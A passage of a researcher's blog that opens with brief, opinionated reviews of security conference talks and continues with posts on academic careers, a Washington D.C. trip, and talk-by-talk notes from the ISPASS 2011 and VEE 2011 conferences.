Sebastian is a PhD student in Erlangen. He studies side-channel attacks on web pages. The talk introduces timing analysis, how to get exact timing measurments, and how to remove jitter. He talks about different approaches based on TCP/IP how to measure jitter for each packet instead of per connection. If the sever side is stacked (PHP over Apache) then you need domain specific knowledge, you need to know which parts are sent by Apache and when control is passed to PHP. Using this DS knowledge you can reduce the jitter inside the PHP application. The idea is pretty straigth-forward. Do n measurments, do statistic analysis, compare, get hidden data. Talk shows attack on XML RSA encryption using timing attack (based on PKCS#1 decryption and pre-existing attack); combine both techniques to break XML encrypted messages.

Security Log Visualization with a Correlation Engine, Chris Kubecka (5)

Solid talk about how to use correlation engines to analyze log files.

Apple vs. Google Client Platforms, Bruhns, FX of Phenoelit, greg (4)

FX and some guys bash about Apple and Google client platforms. They analyze the hardware platforms of the Google Chromebook (no good exploits found) and the iPad 1 (some possible exploits similar to red snow found, red snow uses a bug in the boot ROM that can not be fixed by Apple). They also found some bugs in the markets of Apple and Google. Both markets are vulnerable to XSS exploits. All in all I expected more of this talk. The presentation was good but FX was overselling the bugs they found and in my opinion there was too much bashing around.

Protecting Software, dosbart (3)

How to protect legacy software from piracy. So-so talk that ended in a long rant against piracy and software cracking.

X(tra|ml|slt|query|dp|mas) pwnage, Nicob (3)

Let's just use XSL bugs to inject new code into a server and let's execute it server side. Nicob includes details on how to transcode procedural-oriented code into functional-oriented code used by XSL. Talk was not that interesting as he presented too many details on how to write code instead of showing individual attacks.

Automatic Algorithm Invention with a GPU, Wes Faler (2)

Wes talks about genetic programming and GPU programming. I was not that interested in the topic of the talk and drifted off pretty soon. In addition I do not believe that genetic programming or some other automatic programming techniques will be able to evolve automatically generated code to very complex/optimized algorithms.

What I would have liked to watch:

So your 0day exploit beats ASLR, DEP and FORTIFY? I don’t care, Erik Bosman

Erik would have presented Minemu, a minimal binary translator that executes full memory taint checking. I read the paper and the work looks solid, the discussion with Erik was also very interesting. Unfortunately the talk was canceled due to timing issues.

Academic careers or how to become a professor.

2011-05-12T05:15:00-04:00

Summary: Have a vision. Stay foolish.

Introduction

On May 11th 2011 the VMI (the organization of the scientific staff at the CS department at ETH Zurich where I'm currently the president) organized an informational event on how to start and how to structure your academic career. If you are pursuing a PhD then at one point in time you will think about continuing your academic career by either becoming a professor or by working at a research lab. Many people on the other hand will turn away from an academic career at a later point. We asked ourselves what it takes to pursue the academic career, what are pros and cons of becoming a professor vs. either working in a research lab or vs. working in the industry.

Three speakers presented their academic careers and told us about their ideas and how they structured their academic life. An open question session also allowed the audience to ask personal and detailed questions why they made individual decisions. Andreas Krause, a new assistant professor at ETH Zurich gave an impression of the beginnings of an academic career at an university, Christian Cachin then talked about working at a research lab at IBM Research Zurich. The third speaker was Markus Gross, full professor at ETH Zurich and head of Disney Research Zurich.

In this blog post I try to summarize the information they gave us, but I'll twist that information with my own thoughts and my own (incomplete) experience about the topic after being in the PhD program for almost 5 years.

How to evolve

It is surprising that many academic careers evolve out of similar roots and environments. Many academics were big nerds in their teens, disassembled hardware, and were fiddling around with technology all the time. This brings back memories from my own youth where I was dumpster diving for old hardware. I was also well known for disassembling any electronic hardware I got into my hand. Sometimes I blew the fuses of our house, but more often it seemed to work. At one point in time this curiosity came across the first computer and the average technology nerd then tries to figure out how this magical machine works. So all in all curiosity and affinity to electronic hardware appears to be a good foundation for future academic career. You have to keep that curiosity to figure out unknown and unresolved problems and you need to stay foolish enough to try out things nobody has tried before.

Research

Both research labs and universities have their individual advantages and disadvantages if you are interested in research. At the university you have absolute freedom what you research and you are only bound indirectly by the funding you are able to attract. If you are not able to attract funding then you are limited in the amount of research you can carry out. On the other hand if you work in a research lab then the boss of that research lab will control in what are you will do research (so better choose your lab wisely).

Additionally, one of the biggest differences between academia and research labs is that research labs are interested in patents. You are measured by the amount of patents you put out, not by the amount of papers that you present at academic conferences. Writing a patent will take up as much time as writing a scientific paper, including all revisions.

One drawback of academia is that research is only a (small) part of your daily life. Due to teaching lectures, mentoring students, and balancing other responsibilities research will only be one of many activities that you need to worry about. On the other hand at a research lab you are able to work full time

on your ideas (minus maybe some mentoring overhead if you are a group leader or a tech. lead).

Funding

If you want to carry out research in academia you need money first. In some universities there are some fixed positions or paid positions per assistant professor or full professor, additional positions must be financed through external funding.

On the other hand in research labs you are often bound by project budgets and you are limited how much time you spend for a specific project until it must pay off.

So both in academia and in research labs you need to worry to some extent about money to fund your research.

Lectures

In academia you need to give lectures as well. Planning lectures and creating the curriculum takes up a lot of time. If you do not like teaching then academia is definitively the wrong place for you. Both professors agreed that they really like teaching and that it is a very satisfying feeling to work with the brightest young students and teaching them new things.

Building your own group

The basic idea is that good people attract other good people. If you are a good lecturer then you will attract the bright students. If you publish good results then you will get good post docs. In addition you need to approach the good students directly.

Advice to kick-start your academic career

Some advice to kick-start your academic career is to go for fellowships, e.g., Microsoft Research, IBM Research, Google, Yahoo! Key Scientific Challenges and governmental fellowships (e.g., SNF, NSF).

At conferences you should give tutorials and organize interesting workshops at top conferences. As a (PhD) student you should search for interesting (research) internship positions at interesting places. This helps you to build your network of professional mentors that you can use later on for reference letters, to meet new people, to attract funding, and fellowships.

A drawback of academia is that it is a probabilistic system. There is no guarantee that if you have x good publications and y good talks and references then you will get tenure. Always go for new ideas and be the first or one of the first. Have a vision. Stay foolish.

Time management

One of the most important factors of academic careers is time management and resource planning. No matter weather you go for a research position in a lab or at a university you need to plan your available time. Otherwise the combination of all your auxiliary tasks will use up all your available time and you will have no more time for fun things like research, teaching, or spending time with your friends and family.

Is it worth it?

From the view of both professors (one halfway into his career, the other at the beginning of his career) and from my view in front of the PhD finishing line: absolutely yes. Your mileage may vary of course.

Resources:

Academic job listings (watch out for the academic cycle in the US!) What they didn't tell you in grad school (Paul Grey and David E. Drew), either buy it or get the PDF.

40 hours in Washington D.C.

2011-04-18T10:56:00-04:00

I was on a tight schedule as I only had around 30 hours in Washington D.C. to see all the mayor sights. First of all I stayed in the Downtown Washington D.C. Hostel, which was great because I could just walk to Union Station and all the major sights.

I arrived around 5pm on Baltimore-Washington International Airport. From there I took the shuttle to the MARC train station and drove to Union Station (for 6$, Amtrak for the same distance was around 60$, but would have been 15mins faster). After dropping my bags off at the Hostel it was already getting dark so I hopped over to see the Capitol by night. On the way back I walked through Chinatown and got a first impression of the city. Washington appears to be a small scale version of New York and with smaller houses that have a more English touch (brick houses next to Union Station).

I started my day in Washington with a big breakfast in Union Station, then went to the Capitol for the free tour (takes about 90minutes after you are in) which is absolutely worth it, just be there early! The rest of the day I meandered through the National Mall and checked out all the sights there like Ulysses Grant Memorial, National Gallery of Art sculpture garden, Washington Monument which is really impressive from close up, World War II Memorial, Lincoln Memorial (which I assumed would be more impressive), Vietnam Veterans Memorial, and the White House. On my 6 hour walk I also took tons of pictures from all these sights. An interesting note is that the National Mall was more or less deserted in the morning (from 8-10am). It gets more crowded after 10am when the museums open.

To combine history/monuments with some interesting notes I went to the Smithsonian National Air and Space Museum which is just awesome. It took me around 3 hours to see all the interesting space capsules, rockets, and airplanes. The museum gives you great details about everything man-made that flies and is absolutely worth a visit if you are even a little bit of a tech geek. The second museum I visited was the National Museum of National History which had great exhibits showing the evolution of mankind in particular and of all mammals and animals in general.

Combining two museum visits and all the other sights in one day was a lot so I headed over to 7th street and H street NW for dinner in Chinatown where I got good Pho (some form of Asian noodle soup with beef in it) and then headed to the movies to relax. All in all it was a great day with perfect weather to visit all the outdoor attractions and I had lots of fun.

On the next morning I only had a couple of hours to kill before getting the shuttle to the airport. So I headed over to the National Library of Congress and checked out the making of the constitution and all the other interesting artifacts they have on display. If you are a bookworm or interested in US history then the Library is worth a visit!

I flew out form Dulles International Airport and I actually booked a Super Shuttle to get me there. I already booked them a couple of times and it usually works out pretty well. But this time I got screwed over twice, first of all I made a mistake on my reservation, putting 506 H Street NW instead of 506 H Street NE on the form. The shuttle driver just went to the wrong part of the city and did not even bother to call me. After waiting on the street during the pickup window I waited for 10 more minutes in their phone loop until I was told that I have to make a new reservation and that the money is lost. So I made a new reservation with the correct address and waited for another 30 minutes. And the second driver/shuttle did not show up as well, so I got screwed twice and had to beg the hostel owner to drive me to the airport. Which worked out well in the end as we is an awesome guy and tries to help wherever he can, but I will never again take Super Shuttle in Washington D.C.! So to summarize: Washington D.C. is a great and interesting city where you can reach all the major attractions by foot. It is one of the american cities that has a lot of history and is really worth a visit. Stay in Downtown Washington for the full experience and take public transport to get around!

Conference remarks: ISPASS 2011

2011-04-13T13:45:00-04:00

As you might know I've been presenting at the IEEE ISPASS'11 conference in Austin, Texas. The conference went from April 10th to April 12th. If you are interested you can read my ramblings about the talks below.

Conference information

(David Brooks & Rajeev Balasubramonian)

75+ Registrations 64 submissions in total, 4 PC reviews/paper, accepted via consensus, 24 accepted papers.

Keynote: The Era of Heterogeneity: Are we prepared?

(Ravi Iyer, Intel)

Shift from client/server to smart devices (tablets, smart phones, ...) Integrate GPU, IP into CPU core for power efficiency, it's no longer just about cores but also about the accelerators that we integrate into the CPU.

Why heterogeneity? Because the workloads are heterogeneous and one single solution (general purpose core) will not work. Small cores scale and good power performance, big cores are needed for single threaded performance. The talk sounds a lot like ISCA'09 where they proposed a heterogeneous architecture with one big core and multiple small cores. Intel's Idea: SPECS (Scalability, Programmability, Energy, Compatibility, Scheduling/Management)

Questions for cores and accelerators are: How to mix and prioritize heterogeneous cores? Should all cores have the same ISA (e.g., SEE)? How should we structure the cache architecture? Solution for mixed ISA: Use a co-op model and run applications on any core. If we have an unsupported opcode exception on the smaller core than the OS must move the application to the bigger core. This sounds a little like Albert Noll's VM for the Cell. What about hardware tricks for context switches? (Great talk!)

Session 1: Best Paper Nominees (David Christie, AMD)

Characterization and Dynamic Mitigation of Intra-Application Cache Interference (Carole-Jean Wu, Margaret Martonosi, Princeton University)

Intra-Application cache interference is a challenging problem. Measure and characterize the cache behavior of applications. Paper uses two-folded measurements, Intel Nehalem using perfmon2 and Simics/GEMS for an artificial system. Measurements show that system cache lines are usually not reused (source: mostly TLB misses) so these misses pollute the application cache lines.

Propose new cache systems that adhere to the fact that cache lines from a system context are not reused as often as cache lines from a user context.

Questions: Measurement done on 64/32b system? Are there differences due to different page placement?

A Semi-Preemptive Garbage Collector for Solid State Drives (Junghee Lee*, Uoungjae Kim, Galen M. Shipman, Sarp Oral, Jongman Kim*, Feiyi Wang, Oak Ridge National Laboratory, Georgia Institute of Technology*)

Block replacement strategies and how to cope with flash problems. Implement some form of GC for flash blocks. Fast access speed but performance degradation due to garbage collection. New form of GC inside the SSD.

PRISM: Zooming in Persistent RAM Storage Behavior (Ju-Young Jung, Sangeyeun Cho, University of Pittsburgh)

Block-oriented FS for PRAM. Not my field.

Evaluation and Optimization of Multicore Performance Bottlenecks in Supercomputing Applications (Jeff Diamond, Martin Burtscher, John D. McCalpin, Byoung-Do Kim, Stephen W. Keckler, James C. Browne, University of Texas Austin, Texas State University, and NVIDIA)

Moore's law of super computing: scale the number of cores! Motivation for this paper: inter-chip scalability. New compiler optimizations for multi-core cpus, depending on cache-layout and coordination. Use AMD performance counters to measure HPC performance.

Most important performance options for multi-core are: L3 Miss Rates (cache contention), Off Chip Bandwidth, DRAM contention (DRAM page miss rates) (Great talk!)

Session 2: Memory Hierarchies (Suzanne Rivoire, Sonoma State University)

Minimizing Interference through Application Mapping in Multi-Level Buffer Caches (Christina M. Patrick, Nicholas Voshell, Mahmut Kandemir, Pennsylvania State University)

Storage paper that handles a switched network with a complicated node hierarchy. The paper introduces interference predictors for the I/O route through the network and analyzes buffer cache placement. -ETOOMANYFORMULAS (for me)

Analyzing the Impact of Useless Write-Backs on the Endurance and Energy Consumption of PCM Main Memory (Santiago Bock, Bruce R. Childers, Rami G. Melhem, Daniel Mosse, Youtao Zhang, University of Pittsburgh)

20-40% of energy consumption due to memory system. Use PhaseChangeMemory instead of DRAM. Low static power (non volatile), read performance comparable to DRAM, scales better than DRAM, bug high energy cost for writes and limited write endurance. Observation: a write-back is useless if the data is not used again later on. Use application information from allocator, control flow analysis or stack pointer. Focus: how many useless write-backs can be avoided using these metrics? 3 different regions analyzed: heap: use malloc / free; global: control flow analysis; stack: stack pointer.

What about DRAM, would that make sense as well? (Reducing the number of write-backs), e.g. for cache coherency in multi-cores? His solution: application tells the HW which regions are dead / alive.

Access Pattern-Aware DRAM Performance Model for Multi-Core Systems (Hyojin Choi, Jongbok Lee*, Wonyong Sung, Seoul National University, Hansung University*)

Latency between different banks, very low level/HW.

Characterizing Multi-threaded Applications based on Shared-Resource Contention (Tanimo Dey, Wei Wang, Jack Davidson, Mary Lou Soffa, University of Virginia)

Check/measure intra-application contention and inter-application contention for L1/L2/Front side bus.

Session 3: Tracing (Tom Wenisch, University of Michigan)

Trace-driven Simulation of Multithreaded Applications (Alejandro Rico*, Alejandro Duran*, Felipe Cabarcas*, Alex Ramirez, Yoav Etsion*, Mateo Valero*, Barcelona Supercomputing center*, Universitat Politecnica de Catalunya)

How to simulate multi-threaded applications using traces? Capture traces for sequential code sections, capture calls to parops but do not capture the execution of parops. Interesting but not my topic.

Efficient Memory Tracing by Program Skeletonization (Alain Ketterlin, Philippe Clauss, Universite de Strasbourg & INRIA)

We want to get the minimum amount of code to reproduce the memory layout of an application. Instrumentation is expensive but useful as a baseline. To improve from there we need to find loops in binary code, try to recognize patterns and generate access sequences to remove instrumentation. Work on machine code and find register accesses movl %eax, [%ebx, %ecx, 8]

Program skeletonization extracts what is useful to compute the memory addresses.

Do you also track direct registers (e.g., the address computation happens before)? You decouple the memory recording and the application, so recording happens with loose correlation to the application. How do you handle threads/concurrent memory accesses? Exceptions? (Great talk!)

Portable Trace Compression through Instruction Interpretation (Svilen Kanev, Robert Cohn*, Harvard University, Intel*) If you are reliably able to predict a byte stream you do not need to record it

Reception & Poster Session

VMAD: A Virtual Machine for Advanced Dynamic Analysis of Programs (Alexandra Jimborean, Matthieu Hermann*, Vincent Loechner, Philippe Claus, INRIA, Universite Strasbourg*)

Interesting work on LLVM that adds different alternatives and tries reverse compilation to turn, e.g., while loops into for loops and adaptively optimize them (for C/C++ code). Interesting work, maybe forward her Olivers' work

Performance Characterization of Mobile-Class Nodes: Why Fewer Bits is Better

(Michelle McDaniel, Kim Hazelwood, University of Virginia)

For netbooks 32bit code is faster than 64bit code. What kind of GCC settings did you use? Mention Acovea, also her masters is about padding, give her a pointer to my work.

Keynote II: Integrated Modeling Challenges in Extreme-Scale Computing

(Pradip Bose, IBM)

Exa-Scale Computing is 10^18 which is 100x peta-scale computing. What is the wall: power or reliability?

Power-wall: We need to reduce power needed in chips, dozens of cores per chip that are allowed to use 1/1000 of power. Idea: different processing modes: storage mode; turn of parallel cores, computing mode: turn off storage controllers, I/O. Reliability wall: MTTF and reliability drops with the increased numbers of transistors. Problem: with millions of cores/cpus MTTF is so low that super computers are not even able to complete linpack benchmarks between failures. MTTR/MTTF (mean time to repair vs. mean time to failure).

Session 4: Emerging Workloads (Derek Chiou, UT Austin)

Where is the Data? Why you Cannot Debate CPU vs. GPU Performance Without the Answer (Chris Gregg, Kim Hazelwood, University of Virginia)

GPU computation is fast but data transfer from/to the GPU is a bottleneck. GPU speedup is misleading without describing the data transfer necessities.

Questions: What about algorithms with dual-use approach where the CPU does not idle during kernel? What about compression? (Great talk!)

Accelerating Search and Recognition Workloads with SSE 4.2 String and Text Processing Instructions (Guangyu Shi, Min Li, Mikko Lipasti, UW-Madison)

STTNI can be used to implement broad set of search and recognition application, embrace newly available instructions to speed up classical algorithms. pcmpestri: packed compare explicit length strings return index. New instructions can be used for any data comparisons. Depending on data structure different algorithms are needed. Easy for arrays, tree structure need some B-Tree and similar handling as strings, for hash tables more complicated but resolve collisions with STTNI.

What about aligned loads, or loop unrolling for this code? Example was a single static loop that did use unaligned loads (expensive) and no manual loop unrolling. Speaker only compared to GCC, not ICC or other compilers.

A Comprehensive Analysis and Parallelization of an Image Retrieval Algorithm (Zhenman Fang, Weihua Zhang, Haibo Chen, Binyu Zang, Fudan University)

You shall not use Comic, Sans Serif, Courier, and Serif fonts on one slide!

Performance Evaluation of Adaptivity in Transactional Memory (Mathias Payer, Thomas R. Gross, ETH Zurich)

My talk. See: https://nebelwelt.net/publications/files/11ISPASS.pdf

Transactional memory (TM) is an attractive platform for parallel programs, and several software transactional memory (STM) designs have been presented. We explore and analyze several optimization opportunities to adapt STM parameters to a running program. This paper uses adaptSTM, a flexible STM library with a non-adaptive baseline common to current fast STM libraries to evaluate different performance options. The baseline is extended by an online evaluation system that enables the measurement of key runtime parameters like read- and write-locations, or commit- and abort-rate. The performance data is used by a thread-local adaptation system to tune the STM configuration. The system adapts different important parameters like write-set hash-size, hash-function, and write strategy based on runtime statistics on a per-thread basis.

We discuss different self-adapting parameters, especially their performance implications and the resulting trade-offs. Measurements show that local per-thread adaptation out- performs global system-wide adaptation. We position local adaptivity as an extension to existing systems.

Using the STAMP benchmarks, we compare adaptSTM to two other STM libraries, TL2 and tinySTM. Comparing adaptSTM and the adaptation system to TL2 results in an average speedup of 43% for 8 threads and 137% for 16 threads. adaptSTM offers performance that is competitive with tinySTM for low-contention benchmarks; for high-contention benchmarks adaptSTM outperforms tinySTM.

Thread-local adaptation alone increases performance on average by 4.3% for 16 threads, and up to 10% for individual benchmarks, compared to adaptSTM without active adaptation.

Session 5: Simulation and Modeling (David Murrell, Freescale)

Scalable, accurate NoC simulation for the 1000-core era (Mieszko Lis, Omer Khan, MIT)

Yet another cycle accurate instruction simulator.

A Single-Specification Principle for Functional-to-Timing Simulator Interface Design (David A. Penry, Brigham Young University)

Desinging simulators. Problem: depending on the level of information that is needed there is a huge performance difference for simulators. Idea: define high-level interface and generate low-level interfaces that offer faster simulation automatically.

WiLIS: Architectural Modeling of Wireless Systems (Kermin Fleming, Man Cheuk Ng, Sam Gross, Arvind, MIT)

Simulator for wireless protocols implemented in hardware (FPGA) for better/more accurate analysis.

Detecting Race Conditions in Asynchronous DMA Operations with Full-System Simulation (Michael Kistler, Daniel Brokenshire IBM)

Using heavy-weight simulation helps in finding DMA bugs for light cache protocols like Cell that have no explicit cache management. This work can also be used for the analysis of cache protocols. (Great talk!)

Mechanistic-Empirical Processor Performance Modeling for Constructing CPI Stacks on Real Hardware (Stijn Eyerman, Kenneth Hoste, Lieven Eeckhout, Ghent University)

Analyze different types of architectures and compare performance and different HW features.

Session 6: Power and Reliability (Bronis de Supinski, LLNL)

Power Signature Analysis of the SPECpower_ssj2008 Benchmark (Chunghsing Hsu, Stephen W. Poole, ORNL)

Use many available measurements and analyze the signatures to develop a better predictor for different CPU models.

Analyzing Throughput of GPGPUs Exploiting Within-Die Core-to-Core Frequency Variation (Jung Seob Lee, Nam Sung Kim, University of Wisconsin, Madison)

Scaling of HW down to very small structures leads to new problems and characteristics.

Universal Rules Guided Design Parameter Selection for Soft Error Resilient Processors (Lide Duan, Ying Zhang, Bin Li, Lu Peng, LSU)

Reduce soft errors in processors due to an analysis of architectural weaknesses.

A Dynamic Energy Management in Multi-Tier Data Centers (Seung-Hwan Lim, Bikash Sharma, Byung Chul Tak, Chita R. Das, The Pennsylvania State University)

How to save energy in data centers.

Final remarks

Jeff Diamond won the best paper award, no other remarks.

VEE conference ramblings

2011-04-13T13:45:00-04:00

As you might know I've been to the VEE'2011 confernece in Newport Beach/LA in the last couple of days. If you are interested in more information about the talks then you can read my notes below.

Conference details:

In total there were 84 abstracts, 64 full submissions, and 20 papers selected for presentation. Corporate sponsors are: VMWare, Intel, Google, Microsoft Research, IBM Research.

Keynote:

Virtualization in the Age of Heterogeneous Machines, *David. F. Bacon* (IBM Research, known for thin locks, http://www.research.ibm.com/liquidmetal/ )

Motivation: It's the multicore area! But what about performance? Three different models of computation exist; CPU: general purpose, GPU: wins at gflops/$ (raw power), FPGA: wins at gflops/$/watt. The drawback is that they are heterogeneous. A possible solution would be to virtualize these heterogeneous systems.

There were basically 2 original ideas in computer science: Hashing & Indirection, all else a combination of those. Virtualization can be categorized in the indirection area. There are two forms of virtualization, namely System VM: Virtualize Environment (VMWare, QEMU - diff machines) and Language VM: Virtualize ISA (MMAME, QEMU - diff architectures). The current VM model usually is the accelerator model, send stuff from CPU to GPU/FPGA for computation, get nice chunk of data back.

What is the solution to get over this heterogeneity? Use virtualization! David introduces LIME: Liquid Metal Programming Language, a single language with multiple backends: CPU, GPU, WSP, & FPGA. This new single language compiles down to different architectures. CPU backend must compile any code, all other backends can decide not to compile that piece of code; e.g., code that is not deeply pipelineable (with increased latency) can be rejected by the GPU compiler. Approach for FPGA uses an artifact store that has solutions for common problems. These artifacts are then stitched together to form the compiled program, otherwise the compilation overhead would be way to large. LmVM: Lime Virtual Machine is introduces as an implementation of the LIME principle. Code originally starts on the CPU and evolves (or can be forced to evolve) to other platforms.

The programming approach is as follows: Java is a subset of Lime. A programmer starts with a Java program and extends it with different Lime features. Many new types are introduced in lime to adhere to the hardware peculiarities in the different machines. [Insert long and lengthy discussion about language features here].

Performance is evaluated using the following scheme: write 4 benchmarks and 4 different versions of each benchmark to compare the different implementations. Baseline is a naive Java implementation. This baseline is compared to a handwritten expert implementation and the automatic Lime compilation. Total man power needed to develop this approach: 8 man years.

Session 1: Performance Monitoring

Performance Profiling of Virtual Machines (Jiaqing Du, Nipun Sehrawat and Willy Zwaenepoel, EPFL Lausanne)

PerfCTR only incur low overhead, a lot faster than binary instrumentation. The drawback is that support for virtual machines is missing. There are three different profiling modes: native profiling (os<->cpu), guest-wide (os<->cpu, without VMM, only guest is profiled), system-wide (os<->VMM<->cpu, both VMM and guest is profiled). Implement performance counters for para-virtualization (Xen), hardware assistance (KVM), and binary translation (QEMU) for both guest-wide profiling and system-wide profiling.

Challenging problems for guest-wide profiling is that the context must be saved for all context switches (e.g., client 1 to VMM, VMM to client 2). The overhead of the implemented approach is low, about 0.4% for the additional counters in all cases. Native overhead in contrast is about 0.04%, so the additional VMM increases the overhead by 10x. An analysis of the accuracy shows that the deviation increases for virtual machines but are still very low for compute-intensive benchmarks. For memory intensive benchmarks QEMU has a lot higher cache miss rate due to the binary translation overhead.

Questions: What about profiling across different VMs? (in the VMM?) Is PEBS supported?

Perfctr-Xen: A Framework for Performance Counter Virtualization (Ruslan Nikolaev and Godmar Back, Virginia Tech Blacksburg)

Perfctr-Xen as an implementation for performance counter virtualization using the perfctr library in Xen. This removes the need for architecture-specific code inside the Xen core to support PMUs. Two new drivers needed to be implemented: Xen Host Perfctr driver, Xen Guest Perfctr driver, and Perfctr library needed to be changed as well.

Questions: What kind of changes in the user-space library and why Xen guest driver are needed? Is PEBS supported? Ruslan did not convince me with his answer to the questions.

Dynamic Cache Contention Detection in Multi-threaded Applications (Qin Zhao, David Koh, Syed Raza, Derek Bruening (Google), Weng-Fai Wong and Saman Amarasinghe, MIT)

The motivation of this talk is to detect cache contention in multi-threaded applications (e.g., false sharing between arrays across multiple threads). Use dynamic instrumentation to keep track of single memory locations using a bitmap and shadow memory. The ownership bitmap for each cache line stores ownership of individual cache lines for each of up to 32 threads. If a thread that accesses a cache line is not single owner then we have a potential data sharing problem. Depending on the performance counters we can detect cache contention. Implementation is on top of Umbra which uses DynamoRIO.

Questions: What tool did you use for BT? How can you know that you measure the real overhead and not some distortion through the instrumentation interface?

Session 2: Configuration

Rethink the Virtual Machine Template (Kun Wang, Chengzhong Xu and Jia Rao)

Main objective of is to reduce the startup overhead of system images down to 1sec. Problem is that the overhead of VM creation is large. Cloning copies files and other solutions are limited to the same physical machine. Idea is to concentrate on the 'substrate' of the virtual machine and only concentrate the smallest possible state (e.g., app/os state). This small substrace can then easily be copied to other machines and restored to full online VM images.

Dolly: Virtualization-driven Database Provisioning for the Cloud (Emmanuel Cecchet, Rahul Singh, Upendra Sharma and Prashant Shenoy, UMASS CS)

Emmanuel used the tagline "Virtual Sex in the Cloud". This work tries to solve the problem of adding database replicas to organize the load on database backends. Problems are that the VM can not just be cloned but a complete databse backup and restore must be carried out so that the DBs can be synced across different nodes. It is hard to replicate state and e.g., instantiate a consistent copy/replica of a database. When the replica is actually ready it misses a couple of updates that happened during the process of generating the replica. The idea of this work is to dynamically scale database backends in the cloud by generating new VM clones and using DB restore in the background. Parameters are snapshot intervals, update frequency of the database which in turn describes the size of the replay log that must be recovered. The evaluation part contains a detailed analysis of different predictors of when to take snapshots, what the replay overhead from the snapshot to the current state is, and how much it would cost on Amazon EC2.

ReHype: Enabling VM Survival Across Hypervisor Failures (Highlight) (Michael Le and Yuval Tamir, UCLA)

VMM is single point of failure for VMs (due to hardware faults or faults in the virtualization software). The problem also is that system reboots (of the host) are too slow. ReHype detects failures and pauses VMs in place. VMM is then micro rebooted. Paused VMs are then integrated into the new VMM instance and unpaused. Related work 'Otherworld' reboots the linux kernel after a failure and keeps processes (applications) in memory. ReHype recovers a failed VMM while preserving the sates of VMs. Possible VMM failures are crash, hang, or silent (no crash/hang detected but VMs fail). Crash: VMM panic handler is executed, hang: VMM watchdog handler is executed. The system was evaluated using faul injections into the VMM sate.

Can only recover from software failures, HW is still the same so persistent HW failures are not protected. Logs are not kept to fix the bugs later on. But in theory this system could also be used to upgrade VMMs.

Questions: What about the size of the system (LOC)?

Session 3: Recovery

Fast and Space Efficient Virtual Machine Checkpointing (Eunbyung Park, Bernhard Egger and Jaejin Lee, Seoul University, South Korea)

Checkpointing can be used for faster VM scaling, high availability, and debugging/forensics. Checkpoint stores volatile state of the VM. A large part of the snapshot data does not need to be saved, e.g., file cache in the Linux kernel. Goal is to make checkpointing faster and to reduce these redundant pages and remove them from the snapshot. A mapping between memory pages and disk blocks is added to the VMM. Problem: how to detect dirty/written pages in memory? It is necessary to check the shadow page-table of the guest. Result: 81% reduction in stored data and 74% reduction in the checkpoint time for para-virtualized guests, 66% reduction in data and 55% reduction in checkpoint time for fully-virtualized guests.

Fast Restore of Checkpointed Memory using Working Set Estimation (Highlight) (Irene Zhang, Yury Baskakov, Alex Garthwaite and Kenneth C. Barr, VMWare)

Reduce time to restore a checkpoint from disk. Current schemes: (1) eager restore; restores all pages to memory. (2) lazy restore; restores only the CPU/device state and only restores memory in the background. If the guest accesses pages that are not yet restored then the VMM must stop the VM and restore that specific page (this can lead to trashing). How to measure restore performance? Time-to-responsiveness measures time until VM is usable. How big is the share of the restore process of the total time? (Mutator utilization, comes from GC communicty that measures GC overhead).

New feature: working-set-restore that prefetches the current working set to reduce VM performance degradation. Working set is estimated using either access-bit scanning or memory tracing. The memory tracing runs alongside the VM all the time (overhead around 0.002%) and keeps track of the working set. When the checkpoint is restored then this set of pages is restored first and the VM is started at the point the checkpoint was taken, so all the pages will be accessed again. (Of course no external I/O may be executed during the checkpointing). Question: Do you do any linearization of the list of the pages that need to be restored? I/O allowed during lazy checkpointing? Working-set-predictor and peeking into the future?

Fast and Correct Performance Recovery of Operating Systems Using a Virtual Machine Monitor (Kenichi Kourai, Institute of Technology, Japan)

A reboot is often the only solution to get over a fault in the system. After a reboot performance is still degraded due to many page misses. A new form of reboot with a warm page cache is proposed. The page cache is kept in memory and can be reused after a reboot. A cache consistency mechanism is added to keep track of the caching information. Saving a couple of seconds after a reboot leads to constant overhead during the runtime due to the implementation. Does this really make sense? Reboots should be infrequent for servers. Does it really make sense to keep the page cache around?

Session 4: Migration

Evaluation of Delta Compression techniques for Efficient Live Migration of Large Virtual Machines (Petter Svard, Benoit Hudzia, Johan Tordsson and Erik Elmroth, Umea University Sweden)

A problem with current solutions is that more pages can turn dirty than pages are transferred to the other host. At one point in time the VM is stopped and the remaining pages are transferred. This leads to a long downtime. Depending on the transfer link it makes more sense to compress, transfer, decompress than to just transfer pages because compression and decompression is faster than the transfer of the full uncompressed page. A special remark is that only pages that were already transferred are compressed. If a page was already transferred and is in the cache of the sender and turns dirty then the delta is constructed, compressed, and sent. Otherwise the plain page is sent. Petter did some live demos.

CloudNet: Dynamic Pooling of Cloud Resources by Live WAN Migration of Virtual Machines (Highlight) (Timothy Wood, KK Ramakrishnan, Prashant Shenoy and Jacobus van der Merwe)

Problem: cloud resources are isolated from one another and the enterprise. The interesting question is how to manage these different isolated machines and how to secure data transfers between the different machines and across multiple data-centers. Use VPNs to connect different data centers and use common migration tools.

Workload-Aware Live Storage Migration for Clouds (Jie Zheng, T. S. Eugene Ng and Kunwadee Sripanidkulchai, Rice University)

Storage migration in a wide-area VM migration contributes the largest part of the data that needs to be transferred. No shared file storage is available, so disk image must be synchronized somehow (based on block migration).

Session 5: Security

Patch Auditing in Infrastructure as a Service Clouds (Highlight; Read paper) (Lionel Litty and David Lie, VMWare / University of Toronto)

Apply your patches! But not everybody does it. Even automatic patch application is not a solution. Also monitoring on the OS level is not continuous or systematic, different applications have different update mechanisms. There is need for a better tool to automate the update mechanism and to monitor the vulnerable state of systems. Additional challenges are VMs that might be powered down or unavailable to the infrastructure administrator. Solution: add patch monitoring to the VMM infrastructure and report to a central tool. Use VMM to detect application updates (binary and text only) and analyze different patches. Use executable bits to detect all live executed code on host VM. Check that executed code is OK.

Patagonix (only binary code detected) -> P2 (extended executable code (bash script, python, executable) detected).

Fine-Grained User-Space Security Through Virtualization (Mathias Payer and Thomas R. Gross, ETH Zurich Switzerland)

My talk. See my paper for details.

Session 6: Virtualization Techniques

Minimal-overhead Virtualization of a Large Scale Supercomputer (Jack Lange, Kevin Pedretti, Peter Dinda, Patrick Bridges, Chang Bae, Philip Soltero and Alexander Merritt, University of Pittsburgh)

Palacios (OS-independent embeddable VMM) and Kitten (lightweight supercomputing OS) for HPC. Key concepts for minimal overhead virtualization are that (1)I/O is passed through, e.g., direct I/O access with no virtualization overhead; (2) virtual paging is optimized for nested and shadow paging; (3) preemption is controlled to reduce host OS noise. The VMM trusts the guest (e.g., to do DMA correctly). Bugs in the guest could bring down the complete system. Symbiotic virtualization as new approach that uses cooperation.

